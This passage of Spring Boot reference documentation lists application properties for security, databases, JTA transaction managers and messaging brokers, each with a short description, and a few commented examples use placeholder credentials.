\n\n\n\t[[common-application-properties-security]]\n\t# ----------------------------------------\n\t# SECURITY PROPERTIES\n\t# ----------------------------------------\n\t# SECURITY ({sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[SecurityProperties])\n\tsecurity.basic.authorize-mode=role # Security authorize mode to apply.\n\tsecurity.basic.enabled=true # Enable basic authentication.\n\tsecurity.basic.path=\/** # Comma-separated list of paths to secure.\n\tsecurity.basic.realm=Spring # HTTP basic realm name.\n\tsecurity.enable-csrf=false # Enable Cross Site Request Forgery support.\n\tsecurity.filter-order=0 # Security filter chain order.\n\tsecurity.filter-dispatcher-types=ASYNC, FORWARD, INCLUDE, REQUEST # Security filter chain dispatcher types.\n\tsecurity.headers.cache=true # Enable cache control HTTP headers.\n\tsecurity.headers.content-type=true # Enable \"X-Content-Type-Options\" header.\n\tsecurity.headers.frame=true # Enable \"X-Frame-Options\" header.\n\tsecurity.headers.hsts= # HTTP Strict Transport Security (HSTS) mode (none, domain, all).\n\tsecurity.headers.xss=true # Enable cross site scripting (XSS) protection.\n\tsecurity.ignored= # Comma-separated list of paths to exclude from the default secured paths.\n\tsecurity.require-ssl=false # Enable secure channel for all requests.\n\tsecurity.sessions=stateless # Session creation policy (always, never, if_required, stateless).\n\tsecurity.user.name=user # Default user name.\n\tsecurity.user.password= # Password for the default user name. A random password is logged on startup by default.\n\tsecurity.user.role=USER # Granted roles for the default user name.\n\n\t# SECURITY OAUTH2 CLIENT ({sc-spring-boot-autoconfigure}\/security\/oauth2\/OAuth2ClientProperties.{sc-ext}[OAuth2ClientProperties])\n\tsecurity.oauth2.client.client-id= # OAuth2 client id.\n\tsecurity.oauth2.client.client-secret= # OAuth2 client secret. A random secret is generated by default.\n\n\t# SECURITY OAUTH2 RESOURCES ({sc-spring-boot-autoconfigure}\/security\/oauth2\/resource\/ResourceServerProperties.{sc-ext}[ResourceServerProperties])\n\tsecurity.oauth2.resource.id= # Identifier of the resource.\n\tsecurity.oauth2.resource.jwt.key-uri= # The URI of the JWT token. Can be set if the value is not available and the key is public.\n\tsecurity.oauth2.resource.jwt.key-value= # The verification key of the JWT token. Can either be a symmetric secret or PEM-encoded RSA public key.\n\tsecurity.oauth2.resource.prefer-token-info=true # Use the token info, can be set to false to use the user info.\n\tsecurity.oauth2.resource.service-id=resource #\n\tsecurity.oauth2.resource.token-info-uri= # URI of the token decoding endpoint.\n\tsecurity.oauth2.resource.token-type= # The token type to send when using the userInfoUri.\n\tsecurity.oauth2.resource.user-info-uri= # URI of the user endpoint.\n\n\t# SECURITY OAUTH2 SSO ({sc-spring-boot-autoconfigure}\/security\/oauth2\/client\/OAuth2SsoProperties.{sc-ext}[OAuth2SsoProperties])\n\tsecurity.oauth2.sso.filter-order= # Filter order to apply if not providing an explicit WebSecurityConfigurerAdapter.\n\tsecurity.oauth2.sso.login-path=\/login # Path to the login page, i.e. the one that triggers the redirect to the OAuth2 Authorization Server.
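\n\n\t# Example (illustrative): pinning the basic-auth user instead of relying on the\n\t# generated random password (values here are placeholders):\n\t#\n\t#   security.user.name=admin\n\t#   security.user.password=change-me\n\t#   security.user.role=USER,ADMIN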
\n\n\n\t# ----------------------------------------\n\t# DATA PROPERTIES\n\t# ----------------------------------------\n\n\t# FLYWAY ({sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[FlywayProperties])\n\tflyway.baseline-description= #\n\tflyway.baseline-version=1 # Version to start migration.\n\tflyway.baseline-on-migrate= #\n\tflyway.check-location=false # Check that migration scripts location exists.\n\tflyway.clean-on-validation-error= #\n\tflyway.enabled=true # Enable flyway.\n\tflyway.encoding= #\n\tflyway.ignore-failed-future-migration= #\n\tflyway.init-sqls= # SQL statements to execute to initialize a connection immediately after obtaining it.\n\tflyway.locations=classpath:db\/migration # Locations of migration scripts.\n\tflyway.out-of-order= #\n\tflyway.password= # JDBC password if you want Flyway to create its own DataSource.\n\tflyway.placeholder-prefix= #\n\tflyway.placeholder-replacement= #\n\tflyway.placeholder-suffix= #\n\tflyway.placeholders.*= #\n\tflyway.schemas= # Schemas to update.\n\tflyway.sql-migration-prefix=V #\n\tflyway.sql-migration-separator= #\n\tflyway.sql-migration-suffix=.sql #\n\tflyway.table= #\n\tflyway.url= # JDBC url of the database to migrate. If not set, the primary configured data source is used.\n\tflyway.user= # Login user of the database to migrate.\n\tflyway.validate-on-migrate= #\n\n\t# LIQUIBASE ({sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[LiquibaseProperties])\n\tliquibase.change-log=classpath:\/db\/changelog\/db.changelog-master.yaml # Change log configuration path.\n\tliquibase.check-change-log-location=true # Check the change log location exists.\n\tliquibase.contexts= # Comma-separated list of runtime contexts to use.\n\tliquibase.default-schema= # Default database schema.\n\tliquibase.drop-first=false # Drop the database schema first.\n\tliquibase.enabled=true # Enable liquibase support.\n\tliquibase.labels= # Comma-separated list of runtime labels to use.\n\tliquibase.parameters.*= # Change log parameters.\n\tliquibase.password= # Login password of the database to migrate.\n\tliquibase.url= # JDBC url of the database to migrate.
If not set, the primary configured data source is used.\n\tliquibase.user= # Login user of the database to migrate.\n\n\t# DAO ({sc-spring-boot-autoconfigure}\/dao\/PersistenceExceptionTranslationAutoConfiguration.{sc-ext}[PersistenceExceptionTranslationAutoConfiguration])\n\tspring.dao.exceptiontranslation.enabled=true # Enable the PersistenceExceptionTranslationPostProcessor.\n\n\t# CASSANDRA ({sc-spring-boot-autoconfigure}\/cassandra\/CassandraProperties.{sc-ext}[CassandraProperties])\n\tspring.data.cassandra.cluster-name= # Name of the Cassandra cluster.\n\tspring.data.cassandra.compression= # Compression supported by the Cassandra binary protocol.\n\tspring.data.cassandra.connect-timeout-millis= # Socket option: connection timeout.\n\tspring.data.cassandra.consistency-level= # Queries consistency level.\n\tspring.data.cassandra.contact-points=localhost # Comma-separated list of cluster node addresses.\n\tspring.data.cassandra.fetch-size= # Queries default fetch size.\n\tspring.data.cassandra.keyspace-name= # Keyspace name to use.\n\tspring.data.cassandra.load-balancing-policy= # Class name of the load balancing policy.\n\tspring.data.cassandra.port= # Port of the Cassandra server.\n\tspring.data.cassandra.password= # Login password of the server.\n\tspring.data.cassandra.read-timeout-millis= # Socket option: read timeout.\n\tspring.data.cassandra.reconnection-policy= # Reconnection policy class.\n\tspring.data.cassandra.retry-policy= # Class name of the retry policy.\n\tspring.data.cassandra.serial-consistency-level= # Queries serial consistency level.\n\tspring.data.cassandra.ssl=false # Enable SSL support.\n\tspring.data.cassandra.username= # Login user of the server.\n\n\t# COUCHBASE ({sc-spring-boot-autoconfigure}\/couchbase\/CouchbaseProperties.{sc-ext}[CouchbaseProperties])\n\tspring.data.couchbase.auto-index=false # Automatically create views and indexes.\n\tspring.data.couchbase.bootstrap-hosts=localhost # Couchbase nodes (host or IP address) to bootstrap from.\n\tspring.data.couchbase.bucket.name= # Name of the bucket to connect to.\n\tspring.data.couchbase.bucket.password= # Password of the bucket.\n\tspring.data.couchbase.consistency=read-your-own-writes # Consistency to apply by default on generated queries.\n\n\t# ELASTICSEARCH ({sc-spring-boot-autoconfigure}\/elasticsearch\/ElasticsearchProperties.{sc-ext}[ElasticsearchProperties])\n\tspring.data.elasticsearch.cluster-name=elasticsearch # Elasticsearch cluster name.\n\tspring.data.elasticsearch.cluster-nodes= # Comma-separated list of cluster node addresses. If not specified, starts a client node.\n\tspring.data.elasticsearch.properties.*= # Additional properties used to configure the client.\n\tspring.data.elasticsearch.repositories.enabled=true # Enable Elasticsearch repositories.\n\n\t# MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/MongoProperties.{sc-ext}[MongoProperties])\n\tspring.data.mongodb.authentication-database= # Authentication database name.\n\tspring.data.mongodb.database=test # Database name.\n\tspring.data.mongodb.field-naming-strategy= # Fully qualified name of the FieldNamingStrategy to use.\n\tspring.data.mongodb.grid-fs-database= # GridFS database name.\n\tspring.data.mongodb.host=localhost # Mongo server host.\n\tspring.data.mongodb.password= # Login password of the mongo server.\n\tspring.data.mongodb.port=27017 # Mongo server port.\n\tspring.data.mongodb.repositories.enabled=true # Enable Mongo repositories.\n\tspring.data.mongodb.uri=mongodb:\/\/localhost\/test # Mongo database URI. When set, host and port are ignored.\n\tspring.data.mongodb.username= # Login user of the mongo server.
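\n\n\t# Example (illustrative): pointing at a remote MongoDB instance with credentials\n\t# via a single URI; the separate host and port properties are then ignored:\n\t#\n\t#   spring.data.mongodb.uri=mongodb:\/\/user:secret@mongo.example.com:27017\/test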
\n\n\t# DATA REST ({sc-spring-boot-autoconfigure}\/data\/rest\/RepositoryRestProperties.{sc-ext}[RepositoryRestProperties])\n\tspring.data.rest.base-path= # Base path to be used by Spring Data REST to expose repository resources.\n\tspring.data.rest.default-page-size= # Default size of pages.\n\tspring.data.rest.enable-enum-translation= # Enable enum value translation via the Spring Data REST default resource bundle.\n\tspring.data.rest.limit-param-name= # Name of the URL query string parameter that indicates how many results to return at once.\n\tspring.data.rest.max-page-size= # Maximum size of pages.\n\tspring.data.rest.page-param-name= # Name of the URL query string parameter that indicates what page to return.\n\tspring.data.rest.return-body-on-create= # Return a response body after creating an entity.\n\tspring.data.rest.return-body-on-update= # Return a response body after updating an entity.\n\tspring.data.rest.sort-param-name= # Name of the URL query string parameter that indicates what direction to sort results.\n\n\t# SOLR ({sc-spring-boot-autoconfigure}\/solr\/SolrProperties.{sc-ext}[SolrProperties])\n\tspring.data.solr.host=http:\/\/127.0.0.1:8983\/solr # Solr host. Ignored if \"zk-host\" is set.\n\tspring.data.solr.repositories.enabled=true # Enable Solr repositories.\n\tspring.data.solr.zk-host= # ZooKeeper host address in the form HOST:PORT.\n\n\t# DATASOURCE ({sc-spring-boot-autoconfigure}\/jdbc\/DataSourceAutoConfiguration.{sc-ext}[DataSourceAutoConfiguration] & {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[DataSourceProperties])\n\tspring.datasource.continue-on-error=false # Do not stop if an error occurs while initializing the database.\n\tspring.datasource.data= # Data (DML) script resource reference.\n\tspring.datasource.dbcp.*= # Commons DBCP specific settings.\n\tspring.datasource.dbcp2.*= # Commons DBCP2 specific settings.\n\tspring.datasource.driver-class-name= # Fully qualified name of the JDBC driver. Auto-detected based on the URL by default.\n\tspring.datasource.hikari.*= # Hikari specific settings.\n\tspring.datasource.initialize=true # Populate the database using 'data.sql'.\n\tspring.datasource.jmx-enabled=false # Enable JMX support (if provided by the underlying pool).\n\tspring.datasource.jndi-name= # JNDI location of the datasource. Class, url, username & password are ignored when set.\n\tspring.datasource.name=testdb # Name of the datasource.\n\tspring.datasource.password= # Login password of the database.\n\tspring.datasource.platform=all # Platform to use in the schema resource (schema-${platform}.sql).\n\tspring.datasource.schema= # Schema (DDL) script resource reference.\n\tspring.datasource.separator=; # Statement separator in SQL initialization scripts.\n\tspring.datasource.sql-script-encoding= # SQL scripts encoding.\n\tspring.datasource.tomcat.*= # Tomcat datasource specific settings.\n\tspring.datasource.type= # Fully qualified name of the connection pool implementation to use. By default, it is auto-detected from the classpath.\n\tspring.datasource.url= # JDBC url of the database.\n\tspring.datasource.username= # Login username of the database.
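\n\n\t# Example (illustrative): a typical MySQL datasource; the driver class is normally\n\t# auto-detected from the URL (credentials here are placeholders):\n\t#\n\t#   spring.datasource.url=jdbc:mysql:\/\/localhost:3306\/mydb\n\t#   spring.datasource.username=dbuser\n\t#   spring.datasource.password=dbpass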
\n\n\t# H2 Web Console ({sc-spring-boot-autoconfigure}\/h2\/H2ConsoleProperties.{sc-ext}[H2ConsoleProperties])\n\tspring.h2.console.enabled=false # Enable the console.\n\tspring.h2.console.path=\/h2-console # Path at which the console will be available.\n\n\t# JOOQ ({sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration])\n\tspring.jooq.sql-dialect= # SQLDialect used by jOOQ when communicating with the configured datasource. For instance `POSTGRES`.\n\n\t# JPA ({sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[JpaBaseConfiguration], {sc-spring-boot-autoconfigure}\/orm\/jpa\/HibernateJpaAutoConfiguration.{sc-ext}[HibernateJpaAutoConfiguration])\n\tspring.data.jpa.repositories.enabled=true # Enable JPA repositories.\n\tspring.jpa.database= # Target database to operate on, auto-detected by default. Can be alternatively set using the \"databasePlatform\" property.\n\tspring.jpa.database-platform= # Name of the target database to operate on, auto-detected by default. Can be alternatively set using the \"Database\" enum.\n\tspring.jpa.generate-ddl=false # Initialize the schema on startup.\n\tspring.jpa.hibernate.ddl-auto= # DDL mode. This is actually a shortcut for the \"hibernate.hbm2ddl.auto\" property. Defaults to \"create-drop\" when using an embedded database, \"none\" otherwise.\n\tspring.jpa.hibernate.naming-strategy= # Naming strategy fully qualified name.\n\tspring.jpa.open-in-view=true # Register OpenEntityManagerInViewInterceptor. Binds a JPA EntityManager to the thread for the entire processing of the request.\n\tspring.jpa.properties.*= # Additional native properties to set on the JPA provider.\n\tspring.jpa.show-sql=false # Enable logging of SQL statements.\n\n\t# JTA ({sc-spring-boot-autoconfigure}\/transaction\/jta\/JtaAutoConfiguration.{sc-ext}[JtaAutoConfiguration])\n\tspring.jta.enabled=true # Enable JTA support.\n\tspring.jta.log-dir= # Transaction logs directory.\n\tspring.jta.transaction-manager-id= # Transaction manager unique identifier.\n\n\t# ATOMIKOS\n\tspring.jta.atomikos.connectionfactory.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool.\n\tspring.jta.atomikos.connectionfactory.ignore-session-transacted-flag=true # Whether or not to ignore the transacted flag when creating a session.\n\tspring.jta.atomikos.connectionfactory.local-transaction-mode=false # Whether or not local transactions are desired.\n\tspring.jta.atomikos.connectionfactory.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread.\n\tspring.jta.atomikos.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool.\n\tspring.jta.atomikos.connectionfactory.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.connectionfactory.max-pool-size=1 # The maximum size of the pool.\n\tspring.jta.atomikos.connectionfactory.min-pool-size=1 # The minimum size of the pool.\n\tspring.jta.atomikos.connectionfactory.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections.
0 denotes no limit.\n\tspring.jta.atomikos.connectionfactory.unique-resource-name=jmsConnectionFactory # The unique name used to identify the resource during recovery.\n\tspring.jta.atomikos.datasource.borrow-connection-timeout=30 # Timeout, in seconds, for borrowing connections from the pool.\n\tspring.jta.atomikos.datasource.default-isolation-level= # Default isolation level of connections provided by the pool.\n\tspring.jta.atomikos.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection.\n\tspring.jta.atomikos.datasource.maintenance-interval=60 # The time, in seconds, between runs of the pool's maintenance thread.\n\tspring.jta.atomikos.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool.\n\tspring.jta.atomikos.datasource.max-lifetime=0 # The time, in seconds, that a connection can be pooled for before being destroyed. 0 denotes no limit.\n\tspring.jta.atomikos.datasource.max-pool-size=1 # The maximum size of the pool.\n\tspring.jta.atomikos.datasource.min-pool-size=1 # The minimum size of the pool.\n\tspring.jta.atomikos.datasource.reap-timeout=0 # The reap timeout, in seconds, for borrowed connections. 0 denotes no limit.\n\tspring.jta.atomikos.datasource.test-query= # SQL query or statement used to validate a connection before returning it.\n\tspring.jta.atomikos.datasource.unique-resource-name=dataSource # The unique name used to identify the resource during recovery.\n\tspring.jta.atomikos.properties.checkpoint-interval=500 # Interval between checkpoints.\n\tspring.jta.atomikos.properties.console-file-count=1 # Number of debug log files that can be created.\n\tspring.jta.atomikos.properties.console-file-limit=-1 # How many bytes can be stored at most in debug log files.\n\tspring.jta.atomikos.properties.console-file-name=tm.out # Debug log file name.\n\tspring.jta.atomikos.properties.console-log-level= # Console log level.\n\tspring.jta.atomikos.properties.default-jta-timeout=10000 # Default timeout for JTA transactions.\n\tspring.jta.atomikos.properties.enable-logging=true # Enable disk logging.\n\tspring.jta.atomikos.properties.force-shutdown-on-vm-exit=false # Specify if a VM shutdown should trigger forced shutdown of the transaction core.\n\tspring.jta.atomikos.properties.log-base-dir= # Directory in which the log files should be stored.\n\tspring.jta.atomikos.properties.log-base-name=tmlog # Transactions log file base name.\n\tspring.jta.atomikos.properties.max-actives=50 # Maximum number of active transactions.\n\tspring.jta.atomikos.properties.max-timeout=300000 # Maximum timeout (in milliseconds) that can be allowed for transactions.\n\tspring.jta.atomikos.properties.output-dir= # Directory in which to store the debug log files.\n\tspring.jta.atomikos.properties.serial-jta-transactions=true # Specify if sub-transactions should be joined when possible.\n\tspring.jta.atomikos.properties.service= # Transaction manager implementation that should be started.\n\tspring.jta.atomikos.properties.threaded-two-phase-commit=true # Use different (and concurrent) threads for two-phase commit on the participating resources.\n\tspring.jta.atomikos.properties.transaction-manager-unique-name= # Transaction manager's unique name.\n\n\t# BITRONIX\n\tspring.jta.bitronix.connectionfactory.acquire-increment=1 # Number of connections to create when growing the pool.\n\tspring.jta.bitronix.connectionfactory.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an
invalid connection was acquired.\n\tspring.jta.bitronix.connectionfactory.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool.\n\tspring.jta.bitronix.connectionfactory.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions.\n\tspring.jta.bitronix.connectionfactory.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted.\n\tspring.jta.bitronix.connectionfactory.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically.\n\tspring.jta.bitronix.connectionfactory.cache-producers-consumers=true # Whether or not producers and consumers should be cached.\n\tspring.jta.bitronix.connectionfactory.defer-connection-release=true # Whether or not the provider can run many transactions on the same connection and supports transaction interleaving.\n\tspring.jta.bitronix.connectionfactory.ignore-recovery-failures=false # Whether or not recovery failures should be ignored.\n\tspring.jta.bitronix.connectionfactory.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool.\n\tspring.jta.bitronix.connectionfactory.max-pool-size=10 # The maximum size of the pool. 0 denotes no limit.\n\tspring.jta.bitronix.connectionfactory.min-pool-size=0 # The minimum size of the pool.\n\tspring.jta.bitronix.connectionfactory.password= # The password to use to connect to the JMS provider.\n\tspring.jta.bitronix.connectionfactory.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction.\n\tspring.jta.bitronix.connectionfactory.test-connections=true # Whether or not connections should be tested when acquired from the pool.\n\tspring.jta.bitronix.connectionfactory.two-pc-ordering-position=1 # The position that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE).\n\tspring.jta.bitronix.connectionfactory.unique-name=jmsConnectionFactory # The unique name used to identify the resource during recovery.\n\tspring.jta.bitronix.connectionfactory.use-tm-join=true # Whether or not TMJOIN should be used when starting XAResources.\n\tspring.jta.bitronix.connectionfactory.user= # The user to use to connect to the JMS provider.\n\tspring.jta.bitronix.datasource.acquire-increment=1 # Number of connections to create when growing the pool.\n\tspring.jta.bitronix.datasource.acquisition-interval=1 # Time, in seconds, to wait before trying to acquire a connection again after an invalid connection was acquired.\n\tspring.jta.bitronix.datasource.acquisition-timeout=30 # Timeout, in seconds, for acquiring connections from the pool.\n\tspring.jta.bitronix.datasource.allow-local-transactions=true # Whether or not the transaction manager should allow mixing XA and non-XA transactions.\n\tspring.jta.bitronix.datasource.apply-transaction-timeout=false # Whether or not the transaction timeout should be set on the XAResource when it is enlisted.\n\tspring.jta.bitronix.datasource.automatic-enlisting-enabled=true # Whether or not resources should be enlisted and delisted automatically.\n\tspring.jta.bitronix.datasource.cursor-holdability= # The default cursor holdability for connections.\n\tspring.jta.bitronix.datasource.defer-connection-release=true # Whether or not the database can run many transactions on the same connection and supports transaction
interleaving.\n\tspring.jta.bitronix.datasource.enable-jdbc4-connection-test= # Whether or not Connection.isValid() is called when acquiring a connection from the pool.\n\tspring.jta.bitronix.datasource.ignore-recovery-failures=false # Whether or not recovery failures should be ignored.\n\tspring.jta.bitronix.datasource.isolation-level= # The default isolation level for connections.\n\tspring.jta.bitronix.datasource.local-auto-commit= # The default auto-commit mode for local transactions.\n\tspring.jta.bitronix.datasource.login-timeout= # Timeout, in seconds, for establishing a database connection.\n\tspring.jta.bitronix.datasource.max-idle-time=60 # The time, in seconds, after which connections are cleaned up from the pool.\n\tspring.jta.bitronix.datasource.max-pool-size=10 # The maximum size of the pool. 0 denotes no limit.\n\tspring.jta.bitronix.datasource.min-pool-size=0 # The minimum size of the pool.\n\tspring.jta.bitronix.datasource.prepared-statement-cache-size=0 # The target size of the prepared statement cache. 0 disables the cache.\n\tspring.jta.bitronix.datasource.share-transaction-connections=false # Whether or not connections in the ACCESSIBLE state can be shared within the context of a transaction.\n\tspring.jta.bitronix.datasource.test-query= # SQL query or statement used to validate a connection before returning it.\n\tspring.jta.bitronix.datasource.two-pc-ordering-position=1 # The position that this resource should take during two-phase commit (always first is Integer.MIN_VALUE, always last is Integer.MAX_VALUE).\n\tspring.jta.bitronix.datasource.unique-name=dataSource # The unique name used to identify the resource during recovery.\n\tspring.jta.bitronix.datasource.use-tm-join=true # Whether or not TMJOIN should be used when starting XAResources.\n\tspring.jta.bitronix.properties.allow-multiple-lrc=false # Allow multiple LRC resources to be enlisted into the same transaction.\n\tspring.jta.bitronix.properties.asynchronous2-pc=false # Enable asynchronous execution of two-phase commit.\n\tspring.jta.bitronix.properties.background-recovery-interval-seconds=60 # Interval in seconds at which to run the recovery process in the background.\n\tspring.jta.bitronix.properties.current-node-only-recovery=true # Recover only the current node.\n\tspring.jta.bitronix.properties.debug-zero-resource-transaction=false # Log the creation and commit call stacks of transactions executed without a single enlisted resource.\n\tspring.jta.bitronix.properties.default-transaction-timeout=60 # Default transaction timeout in seconds.\n\tspring.jta.bitronix.properties.disable-jmx=false # Enable JMX support.\n\tspring.jta.bitronix.properties.exception-analyzer= # Set the fully qualified name of the exception analyzer implementation to use.\n\tspring.jta.bitronix.properties.filter-log-status=false # Enable filtering of logs so that only mandatory logs are written.\n\tspring.jta.bitronix.properties.force-batching-enabled=true # Set if disk forces are batched.\n\tspring.jta.bitronix.properties.forced-write-enabled=true # Set if logs are forced to disk.\n\tspring.jta.bitronix.properties.graceful-shutdown-interval=60 # Maximum amount of seconds the TM will wait for transactions to get done before aborting them at shutdown time.\n\tspring.jta.bitronix.properties.jndi-transaction-synchronization-registry-name= # JNDI name of the TransactionSynchronizationRegistry.\n\tspring.jta.bitronix.properties.jndi-user-transaction-name= # JNDI name of the UserTransaction.\n\tspring.jta.bitronix.properties.journal=disk # Name of the
journal. Can be 'disk', 'null' or a class name.\n\tspring.jta.bitronix.properties.log-part1-filename=btm1.tlog # Name of the first fragment of the journal.\n\tspring.jta.bitronix.properties.log-part2-filename=btm2.tlog # Name of the second fragment of the journal.\n\tspring.jta.bitronix.properties.max-log-size-in-mb=2 # Maximum size in megabytes of the journal fragments.\n\tspring.jta.bitronix.properties.resource-configuration-filename= # ResourceLoader configuration file name.\n\tspring.jta.bitronix.properties.server-id= # ASCII ID that must uniquely identify this TM instance. Defaults to the machine's IP address.\n\tspring.jta.bitronix.properties.skip-corrupted-logs=false # Skip corrupted transaction log entries.\n\tspring.jta.bitronix.properties.warn-about-zero-resource-transaction=true # Log a warning for transactions executed without a single enlisted resource.\n\n\t# EMBEDDED MONGODB ({sc-spring-boot-autoconfigure}\/mongo\/embedded\/EmbeddedMongoProperties.{sc-ext}[EmbeddedMongoProperties])\n\tspring.mongodb.embedded.features=SYNC_DELAY # Comma-separated list of features to enable.\n\tspring.mongodb.embedded.version=2.6.10 # Version of Mongo to use.\n\n\t# REDIS ({sc-spring-boot-autoconfigure}\/redis\/RedisProperties.{sc-ext}[RedisProperties])\n\tspring.redis.database=0 # Database index used by the connection factory.\n\tspring.redis.host=localhost # Redis server host.\n\tspring.redis.password= # Login password of the redis server.\n\tspring.redis.pool.max-active=8 # Max number of connections that can be allocated by the pool at a given time. Use a negative value for no limit.\n\tspring.redis.pool.max-idle=8 # Max number of \"idle\" connections in the pool. Use a negative value to indicate an unlimited number of idle connections.\n\tspring.redis.pool.max-wait=-1 # Maximum amount of time (in milliseconds) a connection allocation should block before throwing an exception when the pool is exhausted. Use a negative value to block indefinitely.\n\tspring.redis.pool.min-idle=0 # Target for the minimum number of idle connections to maintain in the pool. This setting only has an effect if it is positive.\n\tspring.redis.port=6379 # Redis server port.\n\tspring.redis.sentinel.master= # Name of Redis server.\n\tspring.redis.sentinel.nodes= # Comma-separated list of host:port pairs.\n\tspring.redis.timeout=0 # Connection timeout in milliseconds.\n\n\n\t# ----------------------------------------\n\t# INTEGRATION PROPERTIES\n\t# ----------------------------------------\n\n\t# ACTIVEMQ ({sc-spring-boot-autoconfigure}\/jms\/activemq\/ActiveMQProperties.{sc-ext}[ActiveMQProperties])\n\tspring.activemq.broker-url= # URL of the ActiveMQ broker. Auto-generated by default. For instance `tcp:\/\/localhost:61616`\n\tspring.activemq.in-memory=true # Specify if the default broker URL should be in memory. Ignored if an explicit broker has been specified.\n\tspring.activemq.password= # Login password of the broker.\n\tspring.activemq.pooled=false # Specify if a PooledConnectionFactory should be created instead of a regular ConnectionFactory.\n\tspring.activemq.user= # Login user of the broker.\n\n\t# ARTEMIS ({sc-spring-boot-autoconfigure}\/jms\/artemis\/ArtemisProperties.{sc-ext}[ArtemisProperties])\n\tspring.artemis.embedded.cluster-password= # Cluster password. Randomly generated on startup by default.\n\tspring.artemis.embedded.data-directory= # Journal file directory.
Not necessary if persistence is turned off.\n\tspring.artemis.embedded.enabled=true # Enable embedded mode if the Artemis server APIs are available.\n\tspring.artemis.embedded.persistent=false # Enable persistent store.\n\tspring.artemis.embedded.queues= # Comma-separated list of queues to create on startup.\n\tspring.artemis.embedded.server-id= # Server id. By default, an auto-incremented counter is used.\n\tspring.artemis.embedded.topics= # Comma-separated list of topics to create on startup.\n\tspring.artemis.host=localhost # Artemis broker host.\n\tspring.artemis.mode= # Artemis deployment mode, auto-detected by default. Can be explicitly set to \"native\" or \"embedded\".\n\tspring.artemis.port=61616 # Artemis broker port.\n\n\t# SPRING BATCH ({sc-spring-boot-autoconfigure}\/batch\/BatchProperties.{sc-ext}[BatchProperties])\n\tspring.batch.initializer.enabled=true # Create the required batch tables on startup if necessary.\n\tspring.batch.job.enabled=true # Execute all Spring Batch jobs in the context on startup.\n\tspring.batch.job.names= # Comma-separated list of job names to execute on startup (for instance `job1,job2`). By default, all Jobs found in the context are executed.\n\tspring.batch.schema=classpath:org\/springframework\/batch\/core\/schema-@@platform@@.sql # Path to the SQL file to use to initialize the database schema.\n\tspring.batch.table-prefix= # Table prefix for all the batch meta-data tables.\n\n\t# HORNETQ ({sc-spring-boot-autoconfigure}\/jms\/hornetq\/HornetQProperties.{sc-ext}[HornetQProperties])\n\tspring.hornetq.embedded.cluster-password= # Cluster password. Randomly generated on startup by default.\n\tspring.hornetq.embedded.data-directory= # Journal file directory. Not necessary if persistence is turned off.\n\tspring.hornetq.embedded.enabled=true # Enable embedded mode if the HornetQ server APIs are available.\n\tspring.hornetq.embedded.persistent=false # Enable persistent store.\n\tspring.hornetq.embedded.queues= # Comma-separated list of queues to create on startup.\n\tspring.hornetq.embedded.server-id= # Server id. By default, an auto-incremented counter is used.\n\tspring.hornetq.embedded.topics= # Comma-separated list of topics to create on startup.\n\tspring.hornetq.host=localhost # HornetQ broker host.\n\tspring.hornetq.mode= # HornetQ deployment mode, auto-detected by default. Can be explicitly set to \"native\" or \"embedded\".\n\tspring.hornetq.port=5445 # HornetQ broker port.\n\n\t# JMS ({sc-spring-boot-autoconfigure}\/jms\/JmsProperties.{sc-ext}[JmsProperties])\n\tspring.jms.jndi-name= # Connection factory JNDI name. When set, takes precedence over other connection factory auto-configurations.\n\tspring.jms.listener.acknowledge-mode= # Acknowledge mode of the container.
By default, the listener is transacted with automatic acknowledgment.\n\tspring.jms.listener.auto-startup=true # Start the container automatically on startup.\n\tspring.jms.listener.concurrency= # Minimum number of concurrent consumers.\n\tspring.jms.listener.max-concurrency= # Maximum number of concurrent consumers.\n\tspring.jms.pub-sub-domain=false # Specify if the default destination type is topic.\n\n\t# RABBIT ({sc-spring-boot-autoconfigure}\/amqp\/RabbitProperties.{sc-ext}[RabbitProperties])\n\tspring.rabbitmq.addresses= # Comma-separated list of addresses to which the client should connect.\n\tspring.rabbitmq.dynamic=true # Create an AmqpAdmin bean.\n\tspring.rabbitmq.host=localhost # RabbitMQ host.\n\tspring.rabbitmq.listener.acknowledge-mode= # Acknowledge mode of the container.\n\tspring.rabbitmq.listener.auto-startup=true # Start the container automatically on startup.\n\tspring.rabbitmq.listener.concurrency= # Minimum number of consumers.\n\tspring.rabbitmq.listener.max-concurrency= # Maximum number of consumers.\n\tspring.rabbitmq.listener.prefetch= # Number of messages to be handled in a single request. It should be greater than or equal to the transaction size (if used).\n\tspring.rabbitmq.listener.transaction-size= # Number of messages to be processed in a transaction. For best results it should be less than or equal to the prefetch count.\n\tspring.rabbitmq.password= # Login to authenticate against the broker.\n\tspring.rabbitmq.port=5672 # RabbitMQ port.\n\tspring.rabbitmq.requested-heartbeat= # Requested heartbeat timeout, in seconds; zero for none.\n\tspring.rabbitmq.ssl.enabled=false # Enable SSL support.\n\tspring.rabbitmq.ssl.key-store= # Path to the key store that holds the SSL certificate.\n\tspring.rabbitmq.ssl.key-store-password= # Password used to access the key store.\n\tspring.rabbitmq.ssl.trust-store= # Trust store that holds SSL certificates.\n\tspring.rabbitmq.ssl.trust-store-password= # Password used to access the trust store.\n\tspring.rabbitmq.username= # 